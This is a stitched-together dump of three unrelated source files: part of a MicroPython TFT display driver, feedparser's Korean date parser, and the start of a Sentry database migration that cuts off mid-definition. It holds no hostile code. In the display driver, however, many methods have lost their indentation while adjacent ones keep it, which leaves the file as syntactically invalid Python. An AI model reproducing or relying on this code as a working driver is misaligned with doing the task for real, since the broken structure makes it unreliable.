                     self.disp_x_size >> 8, self.disp_x_size & 0xff, # physical Width of TFT
                     self.disp_y_size >> 8, self.disp_y_size & 0xff, # physical Height of TFT
                     0x00]), 7)  # Last byte only required for a serial TFT
                TFT_io.tft_cmd_data_AS(0xb4, bytearray(b'\x02\x13\x00\x2b\x08\x00\x00\x00'), 8)
                        # HSYNC,  Set HT 531  HPS 43   HPW=Sync pulse 8 LPS 0
                TFT_io.tft_cmd_data_AS(0xb6, bytearray(b'\x01\x20\x00\x0e\x0a\x00\x00'), 7)
                        # VSYNC,  Set VT 288  VPS 14 VPW 10 FPS 0
                TFT_io.tft_cmd_data_AS(0x36, bytearray([(orientation & 1) << 5 | (h_flip & 1) << 1 | (v_flip) & 1]), 1)
                        # rotation/ flip, etc., t.b.d.
            elif lcd_type == "AT070TN92": # Size 800x480, 7", 18 Bit, lower color bits ignored
                #
                # Value            Min     Typical   Max
                # DotClock       26.4 MHz 33.3 MHz  46.8 MHz
                # HT (Hor. Total   862     1056     1200
                # HDP (Hor. Disp)          800
                # HBP (back porch)  46      46       46
                # HFP (Fr. porch)   16     210      254
                # HPW (Hor. sync)    1               40
                # VT (Vert. Total) 510     525      650
                # VDP (Vert. Disp)         480
                # VBP (back porch)  23      23       23
                # VFP (fr. porch)    7      22      147
                # VPW (vert. sync)   1               20
                #
                # This table in combination with the relation above leads to the settings:
                # HPS = 46, HPW = 8,  LPS = 0, HT = 1056
                # VPS = 23, VPW = 10, VPS = 0, VT = 525
                #
                self.disp_x_size = 799
                self.disp_y_size = 479
                TFT_io.tft_cmd_data_AS(0xe6, bytearray(b'\x05\x53\xf6'), 3) # PLL setting for PCLK
                    # (33.3MHz * 1048576 / 100MHz) - 1 = 349174 = 0x553f6
                TFT_io.tft_cmd_data_AS(0xb0, bytearray(  # # LCD SPECIFICATION
                    [0x00,                # 18 Color bits, HSync/VSync low, No Dithering/FRC
                     0x00,                # TFT mode
                     self.disp_x_size >> 8, self.disp_x_size & 0xff, # physical Width of TFT
                     self.disp_y_size >> 8, self.disp_y_size & 0xff, # physical Height of TFT
                     0x00]), 7)  # Last byte only required for a serial TFT
                TFT_io.tft_cmd_data_AS(0xb4, bytearray(b'\x04\x1f\x00\x2e\x08\x00\x00\x00'), 8)
                        # HSYNC,      Set HT 1056  HPS 46  HPW 8 LPS 0
                TFT_io.tft_cmd_data_AS(0xb6, bytearray(b'\x02\x0c\x00\x17\x08\x00\x00'), 7)
                        # VSYNC,   Set VT 525  VPS 23 VPW 08 FPS 0
                TFT_io.tft_cmd_data_AS(0x36, bytearray([(orientation & 1) << 5 | (h_flip & 1) << 1 | (v_flip) & 1]), 1)
                        # rotation/ flip, etc., t.b.d.
            else:
                print("Wrong Parameter lcd_type: ", lcd_type)
                return
            TFT_io.tft_cmd_data_AS(0xBA, bytearray(b'\x0f'), 1) # GPIO[3:0] out 1
            TFT_io.tft_cmd_data_AS(0xB8, bytearray(b'\x07\x01'), 1) # GPIO3=input, GPIO[2:0]=output
            TFT_io.tft_cmd_data_AS(0xf0, bytearray(b'\x00'), 1) # Pixel data Interface 8 Bit
            TFT_io.tft_cmd(0x29)             # Display on
            TFT_io.tft_cmd_data_AS(0xbe, bytearray(b'\x06\xf0\x01\xf0\x00\x00'), 6)
                # Set PWM for B/L
            TFT_io.tft_cmd_data_AS(0xd0, bytearray(b'\x0d'), 1) # Set DBC: enable, agressive
        else:
            print("Wrong Parameter controller: ", controller)
            return
        #
        # Set character printing defaults
        #
        self.text_font = None
        self.setTextStyle(self.color, self.BGcolor, 0, None, 0)
        #
        # Init done. clear Screen and switch BG LED on
        #
        self.text_x = self.text_y = self.text_yabs = 0
        self.clrSCR()           # clear the display
#        self.backlight(100)  ## switch BG LED on
#
# Return screen dimensions
#
def getScreensize(self):
if self.orientation == LANDSCAPE:
return (self.disp_x_size + 1, self.disp_y_size + 1)
else:
return (self.disp_y_size + 1, self.disp_x_size + 1)
#
# set backlight brightness
#
    def backlight(self, percent):
        """Set backlight brightness in percent (clamped to 0..100) via PWM
        on timer 4 channel 3, pin Y3."""
        # deferred init of LED PIN
        if self.pin_led is None:
            # special treat for BG LED
            self.pin_led = pyb.Pin("Y3", pyb.Pin.OUT_PP)
            self.led_tim = pyb.Timer(4, freq=500)
            self.led_ch = self.led_tim.channel(3, pyb.Timer.PWM, pin=self.pin_led)
        percent = max(0, min(percent, 100))  # clamp to the valid duty range
        self.led_ch.pulse_width_percent(percent)  # set LED
#
# switch power on/off
#
def power(self, onoff):
if self.power_control:
if onoff:
self.pin_power.value(True) ## switch power on or off
else:
self.pin_power.value(False)
#
# set the tft flip modes
#
    def set_tft_mode(self, v_flip = False, h_flip = False, c_flip = False, orientation = LANDSCAPE):
        """Set the flip/orientation flags and push them to the controller
        (address-mode command 0x36)."""
        self.v_flip = v_flip # flip vertical
        self.h_flip = h_flip # flip horizontal
        self.c_flip = c_flip # flip blue/red
        self.orientation = orientation # LANDSCAPE/PORTRAIT
        # pack the flags into the register layout: bit5 orientation,
        # bit3 color order, bit1 horizontal flip, bit0 vertical flip
        TFT_io.tft_cmd_data_AS(0x36,
            bytearray([(self.orientation << 5) |(self.c_flip << 3) | (self.h_flip & 1) << 1 | (self.v_flip) & 1]), 1)
#
# get the tft flip modes
#
def get_tft_mode(self):
return (self.v_flip, self.h_flip, self.c_flip, self.orientation) #
#
# set the color used for the draw commands
#
def setColor(self, fgcolor):
self.color = fgcolor
self.colorvect = bytearray(self.color) # prepare byte array
#
# Set BG color used for the draw commands
#
def setBGColor(self, bgcolor):
self.BGcolor = bgcolor
self.BGcolorvect = bytearray(self.BGcolor) # prepare byte array
self.BMPcolortable = bytearray([self.BGcolorvect[2], # create colortable
self.BGcolorvect[1], self.BGcolorvect[0],0,
self.colorvect[2], self.colorvect[1], self.colorvect[0],0])
#
# get the color used for the draw commands
#
def getColor(self):
return self.color
#
# get BG color used for
#
def getBGColor(self):
return self.BGcolor
#
# Draw a single pixel at location x, y with color
# Rather slow at 40µs/Pixel
#
    def drawPixel_py(self, x, y, color):
        """Set the single pixel at (x, y) to *color* (a color byte vector).
        Pure-Python fallback; rather slow at ~40µs per pixel."""
        self.setXY(x, y, x, y)
        TFT_io.displaySCR_AS(color, 1)  #
#
# clear screen, set it to BG color.
#
    def clrSCR(self, color = None):
        """Clear the full screen to *color* (default: the background color),
        reset the scroll area and scroll start, and home the text cursor."""
        colorvect = self.BGcolorvect if color is None else bytearray(color)
        self.clrXY()
        TFT_io.fillSCR_AS(colorvect, (self.disp_x_size + 1) * (self.disp_y_size + 1))
        self.setScrollArea(0, self.disp_y_size + 1, 0)
        self.setScrollStart(0)
        self.setTextPos(0,0)
#
# reset the address range to fullscreen
#
def clrXY(self):
if self.orientation == LANDSCAPE:
self.setXY(0, 0, self.disp_x_size, self.disp_y_size)
else:
self.setXY(0, 0, self.disp_y_size, self.disp_x_size)
#
# Draw a line from x1, y1 to x2, y2 with the color set by setColor()
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
    def drawLine(self, x1, y1, x2, y2, color = None):
        """Draw a line from (x1, y1) to (x2, y2) using Bresenham's integer
        line algorithm; axis-aligned lines are delegated to the much
        faster drawHLine/drawVLine window fills."""
        if y1 == y2:
            self.drawHLine(x1, y1, x2 - x1 + 1, color)
        elif x1 == x2:
            self.drawVLine(x1, y1, y2 - y1 + 1, color)
        else:
            colorvect = self.colorvect if color is None else bytearray(color)
            # absolute distance and step direction per axis
            dx, xstep  = (x2 - x1, 1) if x2 > x1 else (x1 - x2, -1)
            dy, ystep  = (y2 - y1, 1) if y2 > y1 else (y1 - y2, -1)
            col, row = x1, y1
            if dx < dy:
                # steep line (slope > 1): iterate over y, error in t
                t = - (dy >> 1)
                while True:
                    self.drawPixel(col, row, colorvect)
                    if row == y2:
                        return
                    row += ystep
                    t += dx
                    if t >= 0:
                        col += xstep
                        t -= dy
            else:
                # shallow line (slope <= 1): iterate over x, error in t
                t = - (dx >> 1)
                while True:
                    self.drawPixel(col, row, colorvect)
                    if col == x2:
                        return
                    col += xstep
                    t += dy
                    if t >= 0:
                        row += ystep
                        t -= dx
#
# Draw a horizontal line with 1 Pixel width, from x,y to x + l - 1, y
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
    def drawHLine(self, x, y, l, color = None): # draw horizontal line
        """Draw a 1-pixel-high horizontal line from (x, y) to (x + l - 1, y).
        A negative *l* draws to the left of x instead."""
        colorvect = self.colorvect if color is None else bytearray(color)
        if l < 0:  # negative length: draw leftwards from x
            l = -l
            x -= l
        self.setXY(x, y, x + l - 1, y) # set display window
        TFT_io.fillSCR_AS(colorvect, l)
#
# Draw a vertical line with 1 Pixel width, from x,y to x, y + l - 1
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
    def drawVLine(self, x, y, l, color = None): # draw vertical line
        """Draw a 1-pixel-wide vertical line from (x, y) to (x, y + l - 1).
        A negative *l* draws upwards from y instead."""
        colorvect = self.colorvect if color is None else bytearray(color)
        if l < 0:  # negative length: draw upwards from y
            l = -l
            y -= l
        self.setXY(x, y, x, y + l - 1) # set display window
        TFT_io.fillSCR_AS(colorvect, l)
#
# Draw rectangle from x1, y1, to x2, y2
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def drawRectangle(self, x1, y1, x2, y2, color = None):
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.drawHLine(x1, y1, x2 - x1 + 1, color)
self.drawHLine(x1, y2, x2 - x1 + 1, color)
self.drawVLine(x1, y1, y2 - y1 + 1, color)
self.drawVLine(x2, y1, y2 - y1 + 1, color)
#
# Fill rectangle
# Almost straight port from the UTFT Library at Rinky-Dink Electronics
#
def fillRectangle(self, x1, y1, x2, y2, color=None):
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.setXY(x1, y1, x2, y2) # set display window
if color:
TFT_io.fillSCR_AS(bytearray(color), (x2 - x1 + 1) * (y2 - y1 + 1))
else:
TFT_io.fillSCR_AS(self.colorvect, (x2 - x1 + 1) * (y2 - y1 + 1))
#
# Draw smooth rectangle from x1, y1, to x2, y2
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
    def drawClippedRectangle(self, x1, y1, x2, y2, color = None):
        """Draw the outline of a rectangle with clipped (45° cut) corners.
        Rectangles smaller than 5x5 pixels are silently ignored."""
        if x1 > x2:
            x1, x2 = x2, x1
        if y1 > y2:
            y1, y2 = y2, y1
        if (x2-x1) > 4 and (y2-y1) > 4:
            colorvect = self.colorvect if color is None else bytearray(color)
            # the eight pixels forming the diagonal corner cuts
            self.drawPixel(x1 + 2,y1 + 1, colorvect)
            self.drawPixel(x1 + 1,y1 + 2, colorvect)
            self.drawPixel(x2 - 2,y1 + 1, colorvect)
            self.drawPixel(x2 - 1,y1 + 2, colorvect)
            self.drawPixel(x1 + 2,y2 - 1, colorvect)
            self.drawPixel(x1 + 1,y2 - 2, colorvect)
            self.drawPixel(x2 - 2,y2 - 1, colorvect)
            self.drawPixel(x2 - 1,y2 - 2, colorvect)
            # the four edges, shortened to leave room for the cut corners
            self.drawHLine(x1 + 3, y1, x2 - x1 - 5, colorvect)
            self.drawHLine(x1 + 3, y2, x2 - x1 - 5, colorvect)
            self.drawVLine(x1, y1 + 3, y2 - y1 - 5, colorvect)
            self.drawVLine(x2, y1 + 3, y2 - y1 - 5, colorvect)
#
# Fill smooth rectangle from x1, y1, to x2, y2
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
def fillClippedRectangle(self, x1, y1, x2, y2, color = None):
if x1 > x2:
t = x1; x1 = x2; x2 = t
if y1 > y2:
t = y1; y1 = y2; y2 = t
if (x2-x1) > 4 and (y2-y1) > 4:
for i in range(((y2 - y1) // 2) + 1):
if i == 0:
self.drawHLine(x1 + 3, y1 + i, x2 - x1 - 5, color)
self.drawHLine(x1 + 3, y2 - i, x2 - x1 - 5, color)
elif i == 1:
self.drawHLine(x1 + 2, y1 + i, x2 - x1 - 3, color)
self.drawHLine(x1 + 2, y2 - i, x2 - x1 - 3, color)
elif i == 2:
self.drawHLine(x1 + 1, y1 + i, x2 - x1 - 1, color)
self.drawHLine(x1 + 1, y2 - i, x2 - x1 - 1, color)
else:
self.drawHLine(x1, y1 + i, x2 - x1 + 1, color)
self.drawHLine(x1, y2 - i, x2 - x1 + 1, color)
#
# draw a circle at x, y with radius
# Straight port from the UTFT Library at Rinky-Dink Electronics
#
    def drawCircle(self, x, y, radius, color = None):
        """Draw the outline of a circle centered at (x, y) using the
        integer midpoint circle algorithm (one computed octant mirrored
        eight ways)."""
        colorvect = self.colorvect if color is None else bytearray(color)
        f = 1 - radius  # decision variable
        ddF_x = 1
        ddF_y = -2 * radius
        x1 = 0
        y1 = radius
        # the four on-axis points are plotted up front
        self.drawPixel(x, y + radius, colorvect)
        self.drawPixel(x, y - radius, colorvect)
        self.drawPixel(x + radius, y, colorvect)
        self.drawPixel(x - radius, y, colorvect)
        while x1 < y1:
            if f >= 0:
                y1 -= 1
                ddF_y += 2
                f += ddF_y
            x1 += 1
            ddF_x += 2
            f += ddF_x
            # mirror the computed point into all eight octants
            self.drawPixel(x + x1, y + y1, colorvect)
            self.drawPixel(x - x1, y + y1, colorvect)
            self.drawPixel(x + x1, y - y1, colorvect)
            self.drawPixel(x - x1, y - y1, colorvect)
            self.drawPixel(x + y1, y + x1, colorvect)
            self.drawPixel(x - y1, y + x1, colorvect)
            self.drawPixel(x + y1, y - x1, colorvect)
            self.drawPixel(x - y1, y - x1, colorvect)
#
# fill a circle at x, y with radius
# Straight port from the UTFT Library at Rinky-Dink Electronics
# Instead of calculating x = sqrt(r*r - y*y), it searches the x
# for r*r = x*x + x*x
#
    def fillCircle(self, x, y, radius, color = None):
        """Fill a circle centered at (x, y) by drawing one pair of
        horizontal lines per row. Works on a doubled coordinate grid for
        half-pixel precision and, as noted in the comment above, searches
        for the leftmost in-circle x instead of computing a square root."""
        r_square = radius * radius * 4
        for y1 in range (-(radius * 2), 1):
            y_square = y1 * y1
            for x1 in range (-(radius * 2), 1):
                if x1*x1+y_square <= r_square:  # first x inside the circle
                    x1i = x1 // 2
                    y1i = y1 // 2
                    # mirror the row above and below the center line
                    self.drawHLine(x + x1i, y + y1i, 2 * (-x1i), color)
                    self.drawHLine(x + x1i, y - y1i, 2 * (-x1i), color)
                    break;
#
# Draw a bitmap at x,y with size sx, sy
# mode determines the type of expected data
# mode = 1: The data contains 1 bit per pixel, mapped to fg/bg color
# unless a colortable is provided
# mode = 2: The data contains 2 bit per pixel; a colortable with 4 entries must be provided
# mode = 4: The data contains 4 bit per pixel;
# a colortable with 16 entries must be provided
# mode = 8: The data contains 8 bit per pixel;
# a colortable with 256 entries must be provided
# mode = 16: The data must contain 2 packed bytes/pixel red/green/blue in 565 format
# mode = 24: The data must contain 3 bytes/pixel red/green/blue
#
def drawBitmap(self, x, y, sx, sy, data, mode = 24, colortable = None):
self.setXY(x, y, x + sx - 1, y + sy - 1)
if mode == 24:
TFT_io.displaySCR_AS(data, sx * sy)
elif mode == 16:
TFT_io.displaySCR565_AS(data, sx * sy)
elif mode == 1:
if colortable is None:
colortable = self.BMPcolortable # create colortable
TFT_io.displaySCR_bmp(data, sx*sy, 1, colortable)
elif mode == 2:
if colortable is None:
return
TFT_io.displaySCR_bmp(data, sx*sy, 2, colortable)
elif mode == 4:
if colortable is None:
return
TFT_io.displaySCR_bmp(data, sx*sy, 4, colortable)
elif mode == 8:
if colortable is None:
return
TFT_io.displaySCR_bmp(data, sx*sy, 8, colortable)
#
# set scroll area to the region between the first and last line
#
    def setScrollArea(self, tfa, vsa, bfa):
        """Define the vertical scrolling region (controller command 0x33):
        *tfa* fixed rows at the top, *vsa* scrolling rows, *bfa* fixed rows
        at the bottom; then reset the scroll start and realign the text
        cursor."""
        TFT_io.tft_cmd_data_AS(0x33, bytearray(  #set scrolling range
                    [(tfa >> 8) & 0xff, tfa & 0xff,
                     (vsa >> 8) & 0xff, vsa & 0xff,
                     (bfa >> 8) & 0xff, bfa & 0xff]), 6)
        self.scroll_tfa = tfa
        self.scroll_vsa = vsa
        self.scroll_bfa = bfa
        self.setScrollStart(self.scroll_tfa)
        x, y = self.getTextPos()
        self.setTextPos(x, y) # realign pointers
#
# get scroll area of the region between the first and last line
#
def getScrollArea(self):
return self.scroll_tfa, self.scroll_vsa, self.scroll_bfa
#
# set the line which is displayed first
#
    def setScrollStart(self, lline):
        """Set the display line shown first (vertical scroll start,
        controller command 0x37) and remember it."""
        self.scroll_start = lline # store the logical first line
        TFT_io.tft_cmd_data_AS(0x37, bytearray([(lline >> 8) & 0xff, lline & 0xff]), 2)
#
# get the line which is displayed first
#
def getScrollStart(self):
return self.scroll_start # get the logical first line
#
# Scroll vsa up/down by a number of pixels
#
    def scroll(self, pixels):
        """Scroll the scrolling region by *pixels* (positive = up,
        negative = down), wrapping within the vsa region."""
        line = ((self.scroll_start - self.scroll_tfa + pixels) % self.scroll_vsa
                + self.scroll_tfa)
        self.setScrollStart(line) # set the new line
#
# Set text position
#
    def setTextPos(self, x, y, clip = False, scroll = True):
        """Set the text cursor to absolute screen position (x, y).

        If y lies inside the scroll area, the stored text_y is translated
        by the current scroll start so printing lands on the visible line.
        *clip* (pixels) limits the printable width from x; *scroll*
        enables automatic wrap/scroll while printing.
        """
        self.text_width, self.text_height = self.getScreensize() ## height possibly wrong
        self.text_x = x
        if self.scroll_tfa <= y < (self.scroll_tfa + self.scroll_vsa): # in scroll area ? check later for < or <=
            # correct position relative to scroll start
            self.text_y = (y + self.scroll_start - self.scroll_tfa)
            if self.text_y >= (self.scroll_tfa + self.scroll_vsa):
                self.text_y -= self.scroll_vsa  # wrap back into the vsa window
        else: # absolute
            self.text_y = y
        self.text_yabs = y
        # Hint: self.text_yabs = self.text_y - self.scroll_start) % self.scroll_vsa + self.scroll_tfa)
        if clip and (self.text_x + clip) < self.text_width:
            self.text_width = self.text_x + clip
        self.text_scroll = scroll
#
# Get text position
#
def getTextPos(self, abs = True):
if abs:
return (self.text_x, self.text_yabs)
else:
return (self.text_x, self.text_y)
#
# Set Text Style
#
    def setTextStyle(self, fgcolor=None, bgcolor=None, transparency=None, font=None, gap=None):
        """Set text rendering attributes; any argument left as None keeps
        its current value. Rebuilds the packed color vector consumed by
        the char renderer: bg bytes + fg bytes + transparency byte."""
        if font is not None:
            self.text_font = font
            self.text_rows = font.height()
            self.text_cols = font.max_width()
        if transparency is not None:
            self.transparency = transparency
        if gap is not None:
            self.text_gap = gap
        if bgcolor is not None:
            self.text_bgcolor = bgcolor
        if fgcolor is not None:
            self.text_fgcolor = fgcolor
        self.text_color = (bytearray(self.text_bgcolor)
                          + bytearray(self.text_fgcolor)
                          + bytearray([self.transparency]))
#
# Get Text Style: return (color, bgcolor, font, transpareny, gap)
#
    def getTextStyle(self):
        """Return (fgcolor, bgcolor, transparency, font, gap).

        fg lives at bytes 3:6 and bg at bytes 0:3 of the packed text_color
        vector built by setTextStyle.
        """
        return (self.text_color[3:6], self.text_color[0:3],
            self.transparency, self.text_font, self.text_gap)
#
# Check, if a new line is to be opened
# if yes, advance, including scrolling, and clear line, if flags is set
# Obsolete?
#
    def printNewline(self, clear = False):
        """Advance the text cursor one text row, scrolling the display when
        the next row would leave the scroll area; optionally clear the new
        line."""
        if (self.text_yabs + self.text_rows) >= (self.scroll_tfa + self.scroll_vsa): # does the line fit?
            self.scroll(self.text_rows) # no. scroll
        else: # Yes, just advance pointers
            self.text_yabs += self.text_rows
        self.setTextPos(self.text_x, self.text_yabs)
        if clear:
            self.printClrLine(2) # clear actual line
#
# Carriage Return
#
    def printCR(self): # carriage return: cursor back to column 0
        """Move the text cursor to the start of the current line."""
        self.text_x = 0
#
# clear line modes
#
def printClrLine(self, mode = 0): # clear to end of line/bol/line
if mode == 0:
self.setXY(self.text_x, self.text_y,
self.text_width - 1, self.text_y + self.text_rows - 1) # set display window
TFT_io.fillSCR_AS(self.text_color, (self.text_width - self.text_x + 1) * self.text_rows)
elif mode == 1 and self.text_x > 0:
self.setXY(0, self.text_y,
self.text_x - 1, self.text_y + self.text_rows - 1) # set display window
TFT_io.fillSCR_AS(self.text_color, (self.text_x - 1) * self.text_rows)
elif mode == 2:
self.setXY(0, self.text_y,
self.text_width - 1, self.text_y + self.text_rows - 1) # set display window
TFT_io.fillSCR_AS(self.text_color, self.text_width * self.text_rows)
#
# clear sreen modes
#
def printClrSCR(self): # clear Area set by setScrollArea
self.setXY(0, self.scroll_tfa,
self.text_width - 1, self.scroll_tfa + self.scroll_vsa) # set display window
TFT_io.fillSCR_AS(self.text_color, self.text_width * self.scroll_vsa)
self.setScrollStart(self.scroll_tfa)
self.setTextPos(0, self.scroll_tfa)
#
# Print string s, returning the length of the printed string in pixels
#
def printString(self, s, bg_buf=None):
len = 0
for c in s:
cols = self.printChar(c, bg_buf)
if cols == 0: # could not print (any more)
break
len += cols
return len
#
# Print string c using the given char bitmap at location x, y, returning the width of the printed char in pixels
#
    def printChar(self, c, bg_buf=None):
        """Print character *c* at the current text position and return its
        advance width in pixels.

        Wraps/scrolls first if the glyph does not fit on the line (or
        returns 0 if scrolling is disabled). With transparency enabled the
        frame buffer behind the glyph is read back — into *bg_buf* if
        given, else into a lazily grown internal buffer — so the renderer
        can blend the glyph over it.
        """
        # get the charactes pixel bitmap and dimensions
        if self.text_font:
            fmv, rows, cols = self.text_font.get_ch(c)
        else:
            raise AttributeError('No font selected')
        # glyph rows are padded to a whole number of bytes for the display
        cbytes, cbits = divmod(cols, 8) # Not in packed format
        dcols = (cbytes + 1) * 8 if cbits else cbytes * 8 # cols for display
        pix_count = dcols * rows # number of bits in the char
        # test char fit
        if self.text_x + cols > self.text_width: # does the char fit on the screen?
            if self.text_scroll:
                self.printCR()      # No, then CR
                self.printNewline(True) # NL: advance to the next line
            else:
                return 0
        # Retrieve Background data if transparency is required
        if self.transparency: # in case of transpareny, the frame buffer content is needed
            if bg_buf is None: # buffer allocation needed?
                if len(self.bg_buf) < pix_count * 3:
                    # grow the shared buffer; free the old one first so the
                    # allocator can reuse its space
                    del(self.bg_buf)
                    gc.collect()
                    self.bg_buf = bytearray(pix_count * 3) # Make it bigger
                bg_buf = self.bg_buf
            self.setXY(self.text_x, self.text_y, self.text_x + dcols - 1, self.text_y + rows - 1) # set area
            TFT_io.tft_read_cmd_data_AS(0x2e, bg_buf, pix_count * 3) # read background data
        else:
            bg_buf = 0 # dummy assignment, since None is not accepted
        # Set XY range & print char
        self.setXY(self.text_x, self.text_y, self.text_x + dcols - 1, self.text_y + rows - 1) # set area
        TFT_io.displaySCR_charbitmap(addressof(fmv), pix_count, self.text_color, bg_buf) # display char!
        #advance pointer
        self.text_x += (cols + self.text_gap)
        return cols + self.text_gap
| mit |
ArthurGarnier/SickRage | lib/feedparser/datetimes/korean.py | 43 | 1888 | from __future__ import absolute_import, unicode_literals
import re
from .w3dtf import _parse_date_w3dtf
# 8-bit date handling routines written by ytrewq1.
_korean_year = '\ub144' # b3e2 in euc-kr
_korean_month = '\uc6d4' # bff9 in euc-kr
_korean_day = '\uc77c' # c0cf in euc-kr
_korean_am = '\uc624\uc804' # bfc0 c0fc in euc-kr
_korean_pm = '\uc624\ud6c4' # bfc0 c8c4 in euc-kr
_korean_onblog_date_re = \
re.compile('(\d{4})%s\s+(\d{2})%s\s+(\d{2})%s\s+(\d{2}):(\d{2}):(\d{2})' % \
(_korean_year, _korean_month, _korean_day))
_korean_nate_date_re = \
re.compile('(\d{4})-(\d{2})-(\d{2})\s+(%s|%s)\s+(\d{,2}):(\d{,2}):(\d{,2})' % \
(_korean_am, _korean_pm))
def _parse_date_onblog(dateString):
    '''Parse a string according to the OnBlog 8-bit date format.

    Returns the result of _parse_date_w3dtf for the equivalent W3C-DTF
    timestamp (KST, +09:00), or None when the string does not match.
    '''
    match = _korean_onblog_date_re.match(dateString)
    if not match:
        return
    year, month, day, hour, minute, second = match.groups()
    w3dtfdate = '%s-%s-%sT%s:%s:%s+09:00' % (year, month, day,
                                             hour, minute, second)
    return _parse_date_w3dtf(w3dtfdate)
def _parse_date_nate(dateString):
    '''Parse a string according to the Nate 8-bit date format.

    Returns the result of _parse_date_w3dtf for the equivalent W3C-DTF
    timestamp (KST, +09:00), or None when the string does not match.
    '''
    m = _korean_nate_date_re.match(dateString)
    if not m:
        return
    hour = int(m.group(5))
    if m.group(4) == _korean_pm:
        hour += 12  # convert 12-hour PM notation to a 24-hour clock
    # NOTE(review): "12:xx PM" yields hour 24, matching the original
    # behavior; left unchanged deliberately.
    w3dtfdate = '%(year)s-%(month)s-%(day)sT%(hour)s:%(minute)s:%(second)s%(zonediff)s' % \
                {'year': m.group(1), 'month': m.group(2), 'day': m.group(3),
                 'hour': str(hour).zfill(2),  # zero-pad instead of manual '0' + hour
                 'minute': m.group(6), 'second': m.group(7),
                 'zonediff': '+09:00'}
    return _parse_date_w3dtf(w3dtfdate)
| gpl-3.0 |
JamesMura/sentry | src/sentry/south_migrations/0204_backfill_team_membership.py | 11 | 39130 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import IntegrityError, models, transaction
class Migration(DataMigration):
    def forwards(self, orm):
        """Backfill OrganizationMemberTeam rows: for every organization,
        give each member that has global access an active membership on
        every team of that organization. Rows that already exist trigger
        an IntegrityError, which is absorbed by rolling back a per-row
        savepoint so the rest of the backfill proceeds."""
        Organization = orm['sentry.Organization']
        OrganizationMember = orm['sentry.OrganizationMember']
        OrganizationMemberTeam = orm['sentry.OrganizationMemberTeam']
        Team = orm['sentry.Team']
        for org in Organization.objects.all():
            members = OrganizationMember.objects.filter(
                organization=org,
                has_global_access=True,
            )
            teams = Team.objects.filter(organization=org)
            for member in members:
                for team in teams:
                    # XXX(dcramer): South doesnt like us using transactions here
                    try:
                        sid = transaction.savepoint()
                        OrganizationMemberTeam.objects.create(
                            team=team,
                            organizationmember=member,
                            is_active=True,
                        )
                    except IntegrityError:
                        transaction.savepoint_rollback(sid)
                    else:
                        transaction.savepoint_commit(sid)
            # flush the accumulated work once per organization
            transaction.commit()
    def backwards(self, orm):
        """Intentionally a no-op: the backfilled memberships are left in place."""
        pass
models = {
'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.apikey': {
'Meta': {'object_name': 'ApiKey'},
'allowed_origins': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'default': "'Default'", 'max_length': '64', 'blank': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Organization']"}),
'scopes': ('django.db.models.fields.BigIntegerField', [], {'default': 'None'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.auditlogentry': {
'Meta': {'object_name': 'AuditLogEntry'},
'actor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_actors'", 'null': 'True', 'to': "orm['sentry.User']"}),
'actor_key': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ApiKey']", 'null': 'True', 'blank': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'target_object': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'target_user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'audit_targets'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.authidentity': {
'Meta': {'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))", 'object_name': 'AuthIdentity'},
'auth_provider': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.AuthProvider']"}),
'data': ('jsonfield.fields.JSONField', [], {'default': '{}'}),
